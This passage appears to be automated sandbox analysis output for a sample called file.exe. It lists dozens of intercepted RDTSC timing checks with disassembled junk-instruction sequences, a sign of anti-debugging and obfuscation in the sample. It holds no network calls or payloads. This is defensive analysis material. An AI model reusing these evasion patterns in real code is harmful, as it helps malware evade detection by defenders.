Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80E51B second address: 80E570 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FF0EC6B64D4h 0x00000011 jne 00007FF0EC6B64C6h 0x00000017 popad 0x00000018 jmp 00007FF0EC6B64CCh 0x0000001d jno 00007FF0EC6B64DEh 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80E570 second address: 80E574 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80E835 second address: 80E83A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80E83A second address: 80E889 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF0EC517C7Ch 0x00000008 jnp 00007FF0EC517C76h 0x0000000e jmp 00007FF0EC517C7Ch 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007FF0EC517C83h 0x00000020 popad 0x00000021 jne 00007FF0EC517C82h 0x00000027 jnl 00007FF0EC517C76h 0x0000002d jng 00007FF0EC517C76h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80E889 second address: 80E893 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80E893 second address: 80E899 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80E899 second address: 80E8A3 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF0EC6B64C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80EB1D second address: 80EB23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80EDFE second address: 80EE02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 80EE02 second address: 80EE08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 814EC5 second address: 814ECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8180FC second address: 818111 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF0EC517C76h 0x00000008 jmp 00007FF0EC517C7Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81824F second address: 818271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0EC6B64CFh 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007FF0EC6B64C6h 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 818271 second address: 818275 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8183C3 second address: 8183CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FF0EC6B64C6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8183CF second address: 8183DD instructions: 0x00000000 rdtsc 0x00000002 js 00007FF0EC517C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8183DD second address: 8183E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8183E1 second address: 8183E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81880D second address: 81882C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 818CA0 second address: 818CA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 818CA6 second address: 818CAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 818CAC second address: 818CFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC517C85h 0x00000007 js 00007FF0EC517C76h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jc 00007FF0EC517C99h 0x00000015 jmp 00007FF0EC517C89h 0x0000001a jmp 00007FF0EC517C7Ah 0x0000001f pop edx 0x00000020 pop eax 0x00000021 push edi 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 818CFB second address: 818D01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 818D01 second address: 818D05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 818D05 second address: 818D0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81F257 second address: 81F25B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81F25B second address: 81F290 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b push edi 0x0000000c jmp 00007FF0EC6B64D1h 0x00000011 pop edi 0x00000012 pushad 0x00000013 push eax 0x00000014 pop eax 0x00000015 jmp 00007FF0EC6B64CAh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81F40F second address: 81F413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81F413 second address: 81F41F instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF0EC6B64C6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81F6B7 second address: 81F6BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81F6BB second address: 81F6BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81F922 second address: 81F92E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FF0EC517C76h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81F92E second address: 81F932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81FA6F second address: 81FA73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81FA73 second address: 81FA79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81FBD4 second address: 81FC2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FF0EC517C81h 0x0000000a jmp 00007FF0EC517C85h 0x0000000f popad 0x00000010 pop ebx 0x00000011 ja 00007FF0EC517C9Eh 0x00000017 push ebx 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c pop ebx 0x0000001d js 00007FF0EC517C92h 0x00000023 jmp 00007FF0EC517C86h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 829A09 second address: 829A0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 829A0D second address: 829A13 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 829A13 second address: 829A40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64CFh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 jmp 00007FF0EC6B64CEh 0x00000019 pop ebx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 829A40 second address: 829A48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 829A48 second address: 829A4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 829B98 second address: 829B9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83BB4A second address: 83BB5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64CFh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 84982B second address: 84984D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF0EC517C88h 0x0000000a popad 0x0000000b push edx 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 850711 second address: 85071B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF0EC6B64C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 85071B second address: 850721 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 850721 second address: 850727 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 850727 second address: 85073A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jno 00007FF0EC517C76h 0x00000009 jns 00007FF0EC517C76h 0x0000000f pop ebx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 85073A second address: 850740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 850899 second address: 8508B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jnc 00007FF0EC517C76h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pop edx 0x00000016 pushad 0x00000017 push edi 0x00000018 pop edi 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8508B6 second address: 8508BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 850B89 second address: 850B93 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF0EC517C7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 850E73 second address: 850E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 856EA9 second address: 856EC0 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF0EC517C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FF0EC517C7Dh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 856EC0 second address: 856EC5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 856EC5 second address: 856ED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 jnp 00007FF0EC517C7Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 866610 second address: 866619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 866619 second address: 86661D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88A9D5 second address: 88A9F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0EC6B64D8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88A9F1 second address: 88AA09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jo 00007FF0EC517C76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007FF0EC517C7Ch 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8898F5 second address: 889905 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF0EC6B64D2h 0x00000008 ja 00007FF0EC6B64C6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 889905 second address: 88990E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88990E second address: 88991E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0EC6B64CAh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88991E second address: 88992F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007FF0EC517C78h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 889BF3 second address: 889BFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FF0EC6B64C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 889BFE second address: 889C1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jnc 00007FF0EC517C7Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jbe 00007FF0EC517C7Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 889C1D second address: 889C39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jmp 00007FF0EC6B64D6h 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 889C39 second address: 889C45 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF0EC517C7Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88A6C2 second address: 88A6C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88A6C8 second address: 88A6CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88A6CC second address: 88A6D6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88A6D6 second address: 88A6DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88BF54 second address: 88BF58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88BF58 second address: 88BF6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0EC517C7Ch 0x00000009 jno 00007FF0EC517C76h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88BF6E second address: 88BF72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88BF72 second address: 88BFA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FF0EC517C76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jg 00007FF0EC517C76h 0x00000013 jg 00007FF0EC517C76h 0x00000019 pop edx 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FF0EC517C87h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 890491 second address: 8904C4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF0EC6B64CCh 0x00000008 jl 00007FF0EC6B64C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 jg 00007FF0EC6B64C8h 0x00000018 pushad 0x00000019 jmp 00007FF0EC6B64D6h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 890835 second address: 89088B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FF0EC517C7Ah 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ecx 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 pop ecx 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push ebx 0x00000017 jmp 00007FF0EC517C88h 0x0000001c pop ebx 0x0000001d mov eax, dword ptr [eax] 0x0000001f push edx 0x00000020 jmp 00007FF0EC517C7Fh 0x00000025 pop edx 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a push eax 0x0000002b push edx 0x0000002c push ecx 0x0000002d jc 00007FF0EC517C76h 0x00000033 pop ecx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 893A96 second address: 893A9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 893A9A second address: 893AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 893AA0 second address: 893AAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 893AAC second address: 893AB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8956A1 second address: 8956C4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF0EC6B64C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jng 00007FF0EC6B64C6h 0x00000011 jc 00007FF0EC6B64C6h 0x00000017 pop esi 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jbe 00007FF0EC6B64CCh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8956C4 second address: 8956C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8956C8 second address: 8956D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FF0EC6B64C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50390 second address: 4F50394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50394 second address: 4F503AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50469 second address: 4F5046F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F5046F second address: 4F50473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50473 second address: 4F50477 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50477 second address: 4F504D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FF0EC6B64D2h 0x00000010 jmp 00007FF0EC6B64D5h 0x00000015 popfd 0x00000016 jmp 00007FF0EC6B64D0h 0x0000001b popad 0x0000001c mov dword ptr [esp], ebp 0x0000001f pushad 0x00000020 jmp 00007FF0EC6B64CEh 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F504D1 second address: 4F504D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F504D5 second address: 4F504D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50524 second address: 4F5053F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC517C87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F5053F second address: 4F50545 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50545 second address: 4F50549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50549 second address: 4F5054D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
